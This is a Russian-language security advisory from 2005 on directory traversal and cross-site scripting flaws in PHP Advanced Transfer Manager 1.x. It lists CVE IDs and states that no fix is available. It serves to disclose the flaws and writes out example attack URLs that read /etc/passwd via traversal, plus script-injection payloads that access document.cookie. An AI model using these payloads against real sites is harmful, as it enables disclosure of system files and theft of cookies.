Security Lab

Обход каталога и межсайтовый скриптинг в PHP Advanced Transfer Manager

Дата публикации:20.09.2005
Дата изменения:29.03.2008
Всего просмотров:2613
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2997
CVE-2005-2999
CVE-2005-3000
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP Advanced Transfer Manager 1.x
Уязвимые версии: PHP Advanced Transfer Manager

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и просмотреть произвольные файлы на системе.

1. Уязвимость существует из-за того, что программное обеспечение не обрабатывает должным образом входные данные в параметрах 'currentdir' и 'current_dir'. Удаленный пользователь может с помощью специально сформированного URL, содержащего символы обхода каталога, просмотреть произвольные файлы на системе с привилегиями Web сервера. Пример:

http://[target]/[path]/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/txt.php?c urrentdir=../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/ htm.php?current_dir=../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://[target]/[pat h]/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://[target]/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://[target]/phpatm/viewers/zip.php?current_dir=../../../.. /../../..&filename=[filename].zip

2. Межсайтовый скриптинг возможен из-за отсутствия проверки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/[path]/viewers/txt.php?font=% 22%
3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path]/viewers/txt.php?normalfontcolor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http:/ /[target]/[path]/viewers/txt.php?mess[31]=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

URL производителей: phpatm.free.fr

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scripting